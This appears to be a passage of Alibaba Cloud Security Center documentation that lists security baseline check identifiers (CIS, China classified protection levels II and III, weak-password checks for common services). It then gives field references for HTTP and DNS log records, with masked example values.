hc_exploit_zookeeper

High risk exploit - ZooKeeper unauthorized access high exploit vulnerability risk

hc_container

hc_docker

Alibaba Cloud Standard - Docker Security Baseline Check

hc_middleware_ack_master

Kubernetes(ACK) Master Internationally Agreed Best Practices for Security

hc_middleware_ack_node

Kubernetes(ACK) Node Internationally Agreed Best Practices for Security

hc_middleware_k8s

Alibaba Cloud Standard-Kubernetes-Master security baseline check

hc_middleware_k8s_node

Alibaba Cloud Standard-Kubernetes-Node security baseline check

cis

hc_suse 15_djbh

SUSE Linux 15 Baseline for China classified protection of cybersecurity-Level III

hc_aliyun_linux3_djbh_l3

Alibaba Cloud Linux 3 Baseline for China classified protection of cybersecurity-Level III

hc_aliyun_linux_djbh_l3

Alibaba Cloud Linux/Aliyun Linux 2 Baseline for China classified protection of cybersecurity-Level III

hc_bind_djbh

China's Level 3 Protection of Cybersecurity - Bind Compliance Baseline Check

hc_centos 6_djbh_l3

CentOS Linux 6 Baseline for China classified protection of cybersecurity-Level III

hc_centos 7_djbh_l3

CentOS Linux 7 Baseline for China classified protection of cybersecurity-Level III

hc_centos 8_djbh_l3

CentOS Linux 8 Baseline for China classified protection of cybersecurity - Level III

hc_debian_djbh_l3

Debian Linux 8/9/10 Baseline for China classified protection of cybersecurity-Level III

hc_iis_djbh

IIS Baseline for China classified protection of cybersecurity-Level III

hc_informix_djbh

China's Level 3 Protection of Cybersecurity - Informix Compliance Baseline Check

hc_jboss_djbh

China's Level 3 Protection of Cybersecurity - Jboss6/7 Compliance Baseline Check

hc_mongo_djbh

MongoDB Baseline for China classified protection of cybersecurity-Level III

hc_mssql_djbh

China's Level 3 Protection of Cybersecurity -SQL Server Compliance Baseline Check

hc_mysql_djbh

Equal Guarantee Level 3-MySql Compliance Baseline Check

hc_nginx_djbh

Equal Guarantee Level 3-Nginx Compliance Baseline Check

hc_oracle_djbh

China's Level 3 Protection of Cybersecurity - Oracle Compliance Baseline Check

hc_pgsql_djbh

Level 3-PostgreSql compliance baseline check

hc_redhat 6_djbh_l3

China's Level 3 Protection of Cybersecurity - Red Hat Enterprise Linux 6 Compliance Baseline Check

hc_redhat_djbh_l3

China's Level 3 Protection of Cybersecurity - Red Hat Enterprise Linux 7 Compliance Baseline Check

hc_redis_djbh

Redis Baseline for China classified protection of cybersecurity-Level III

hc_suse 10_djbh_l3

SUSE Linux 10 Baseline for China classified protection of cybersecurity-Level III

hc_suse 12_djbh_l3

SUSE Linux 12 Baseline for China classified protection of cybersecurity-Level III

hc_suse_djbh_l3

SUSE Linux 11 Baseline for China classified protection of cybersecurity-Level III

hc_ubuntu 14_djbh_l3

Ubuntu 14 Baseline for China classified protection of cybersecurity-Level III

hc_ubuntu_djbh_l3

Waiting for Level 3-Ubuntu 16/18/20 compliance regulations inspection

hc_was_djbh

China's Level 3 Protection of Cybersecurity - Websphere Application Server Compliance Baseline Check

hc_weblogic_djbh

Weblogic Baseline for China classified protection of cybersecurity-Level III

hc_win 2008_djbh_l3

China's Level 3 Protection of Cybersecurity - Windows Server 2008 R2 Compliance Baseline Check

hc_win 2012_djbh_l3

Windows 2012 R2 Baseline for China classified protection of cybersecurity-Level III

hc_win 2016_djbh_l3

Windows 2016/2019 Baseline for China classified protection of cybersecurity-Level III

hc_aliyun_linux_djbh_l2

Alibaba Cloud Linux/Aliyun Linux 2 Baseline for China classified protection of cybersecurity-Level II

hc_centos 6_djbh_l2

CentOS Linux 6 Baseline for China classified protection of cybersecurity-Level II

hc_centos 7_djbh_l2

CentOS Linux 7 Baseline for China classified protection of cybersecurity-Level II

hc_debian_djbh_l2

Debian Linux 8 Baseline for China classified protection of cybersecurity-Level II

hc_redhat 7_djbh_l2

Redhat Linux 7 Baseline for China classified protection of cybersecurity-Level II

hc_ubuntu_djbh_l2

Linux Ubuntu 16/18 Baseline for China classified protection of cybersecurity-Level II

hc_win 2008_djbh_l2

Windows 2008 R2 Baseline for China classified protection of cybersecurity-Level II

hc_win 2012_djbh_l2

Windows 2012 R2 Baseline for China classified protection of cybersecurity-Level II

hc_win 2016_djbh_l2

Windows 2016/2019 Baseline for China classified protection of cybersecurity-Level II

hc_aliyun_linux_cis

Alibaba Cloud Linux 2 Internationally Agreed Best Practices for Security

hc_centos 6_cis_rules

CentOS Linux 6 LTS Internationally Agreed Best Practices for Security

hc_centos 7_cis_rules

CentOS Linux 7 LTS Internationally Agreed Best Practices for Security

hc_centos 8_cis_rules

CentOS Linux 8 LTS Internationally Agreed Best Practices for Security

hc_debian 8_cis_rules

Debian Linux 8 Internationally Agreed Best Practices for Security

hc_ubuntu 14_cis_rules

Ubuntu 14 LTS Internationally Agreed Best Practices for Security

hc_ubuntu 16_cis_rules

Ubuntu 16/18/20 LTS Internationally Agreed Best Practices for Security

hc_win 2008_cis_rules

Windows Server 2008 R2 Internationally Agreed Best Practices for Security

hc_win 2012_cis_rules

Windows Server 2012 R2 Internationally Agreed Best Practices for Security

hc_win 2016_cis_rules

Windows Server 2016/2019 R2 Internationally Agreed Best Practices for Security

hc_kylin_djbh_l3

China's Level 3 Protection of Cybersecurity - Kylin Compliance Baseline Check

hc_uos_djbh_l3

China's Level 3 Protection of Cybersecurity - uos Compliance Baseline Check

hc_best_security

hc_aliyun_linux

Alibaba Cloud Linux/Aliyun Linux 2 Benchmark

hc_centos 6

Alibaba Cloud Standard - CentOS Linux 6 Security Baseline Check

hc_centos 7

Alibaba Cloud Standard - CentOS Linux 7/8 Security Baseline Check

hc_debian

Alibaba Cloud Standard - Debian Linux 8/9/10 Security Baseline

hc_redhat 6

Alibaba Cloud Standard - Red Hat Enterprise Linux 6 Security Baseline Check

hc_redhat 7

Alibaba Cloud Standard - Red Hat Enterprise Linux 7/8 Security Baseline Check

hc_ubuntu

Alibaba Cloud Standard - Ubuntu Security Baseline

hc_windows_2008

Alibaba Cloud Standard - Windows Server 2008 R2 Security Baseline Check

hc_windows_2012

Alibaba Cloud Standard - Windows 2012 R2 Security Baseline

hc_windows_2016

Alibaba Cloud Standard - Windows 2016/2019 Security Baseline

hc_db_mssql

Alibaba Cloud Standard-SQL Server Security Baseline Check

hc_memcached_ali

Alibaba Cloud Standard - Memcached Security Baseline Check

hc_mongodb

Alibaba Cloud Standard - MongoDB version 3.x Security Baseline Check

hc_mysql_ali

Alibaba Cloud Standard - Mysql Security Baseline Check

hc_oracle

Alibaba Cloud Standard - Oracle 11g Security Baseline Check

hc_pgsql_ali

Alibaba Cloud Standard-PostgreSql Security Initialization Check

hc_redis_ali

Alibaba Cloud Standard - Redis Security Baseline Check

hc_apache

Alibaba Cloud Standard - Apache Security Baseline Check

hc_iis_8

Alibaba Cloud Standard - IIS 8 Security Baseline Check

hc_nginx_linux

Alibaba Cloud Standard - Nginx Security Baseline Check

hc_suse 15

Alibaba Cloud Standard - SUSE Linux 15 Security Baseline Check

tomcat 7

Alibaba Cloud Standard-Apache Tomcat Security Baseline

weak_password

hc_mongodb_pwd

Weak Password-MongoDB Weak Password baseline(support version 2. X)

hc_weakpwd_ftp_linux

Weak password - Ftp login weak password baseline

hc_weakpwd_linux_sys

Weak password - Linux system login weak password baseline

hc_weakpwd_mongodb 3

Weak Password-MongoDB Weak Password baseline

hc_weakpwd_mssql

Weak password-SQL Server DB login weak password baseline

hc_weakpwd_mysql_linux

Weak password - Mysql DB login weak password baseline

hc_weakpwd_mysql_win

Weak password - Mysql DB login weak password baseline(Windows version)

hc_weakpwd_openldap

Weak password - Openldap login weak password baseline

hc_weakpwd_oracle

Weak Password-Oracle login weak password detection

hc_weakpwd_pgsql

Weak password - PostgreSQL DB login weak password baseline

hc_weakpwd_pptp

Weak password - pptpd login weak password baseline

hc_weakpwd_redis_linux

Weak password - Redis DB login weak password baseline

hc_weakpwd_rsync

Weak password - rsync login weak password baseline

hc_weakpwd_svn

Weak password - svn login weak password baseline

hc_weakpwd_tomcat_linux

Weak password - Apache Tomcat Console weak password baseline

hc_weakpwd_vnc

Weak password-VncServer weak password check

hc_weakpwd_weblogic

Weak password-Weblogic 12c login weak password detection

hc_weakpwd_win_sys

Weak password - Windows system login weak password baseline

Field name

Description

Example

response_content_length

The length of the message body. Unit: bytes.

612

dst_ip

The IP address of the destination host.

39.105.XX.XX

dst_port

The port of the destination host.

80

host

The IP address or domain name of the destination host.

39.105.XX.XX

jump_location

The redirection address.

123

request_method

The HTTP request method.

GET

http_referer

The HTTP referer. The field contains the URL of the web page that is linked to the resource being requested.

www.example.com

request_datetime

The time when the request is initiated.

2024-08-01 06:59:28

status

The HTTP status code.

200

content_type

The type of the request content.

text/plain;charset=utf-8

response_content_type

The type of the response content.

text/plain; charset=utf-8

src_ip

The source IP address.

31.220.XX.XX

src_port

The source port.

59524

request_uri

The request URI.

/report

http_user_agent

The user agent that initiates the request.

okhttp/3.2.0

http_x_forward_for

The HTTP request header that records the originating IP address of the client.

31.220.XX.XX

Field name

Description

Example

additional

The additional field that is returned by the DNS server and records information such as the CNAME record, MX record, and PTR record.

N/A

additional_num

The number of additional records returned by the DNS server.

0

answer

The DNS answer returned by the DNS server, which indicates the resolution results. A DNS answer contains the IP address to which the requested domain name is resolved or other information such as the A record and the AAAA record.

example.com A IN 52 1.2.XX.XX

answer_num

The number of DNS answers.

1

authority

The authority field returned by the DNS server. An authority is the DNS server that manages and resolves the domain name. An authority field contains information about a DNS server that provides the DNS record for the requested domain name, such as the NS record.

NS IN 17597

authority_num

The number of authorities.

1

client_subnet

The subnet of the client.

59.152.XX.XX

dst_ip

The destination IP address.

106.55.XX.XX

dst_port

The destination port.

53

net_connect_dir

The direction of data transmission. Valid values:

• in: request to the DNS server

• out: response from the DNS server

out

qid

The ID of the query.

13551

query_name

The domain name that is queried.

example.com

query_type

The type of the query.

A

query_datetime

The time of the query.

2024-08-01 08:33:58

rcode

The response code returned by the DNS server, which indicates the DNS resolution result.

0

region

The ID of the source region. Valid values:

• 1: China (Beijing)

• 2: China (Qingdao)

• 3: China (Hangzhou)

• 4: China (Shanghai)

• 5: China (Shenzhen)

• 6: other regions

1

response_datetime

The response time of the DNS server.

2024-08-01 08:31:25

src_ip

The source IP address.

106.11.XX.XX

src_port

The source port.

22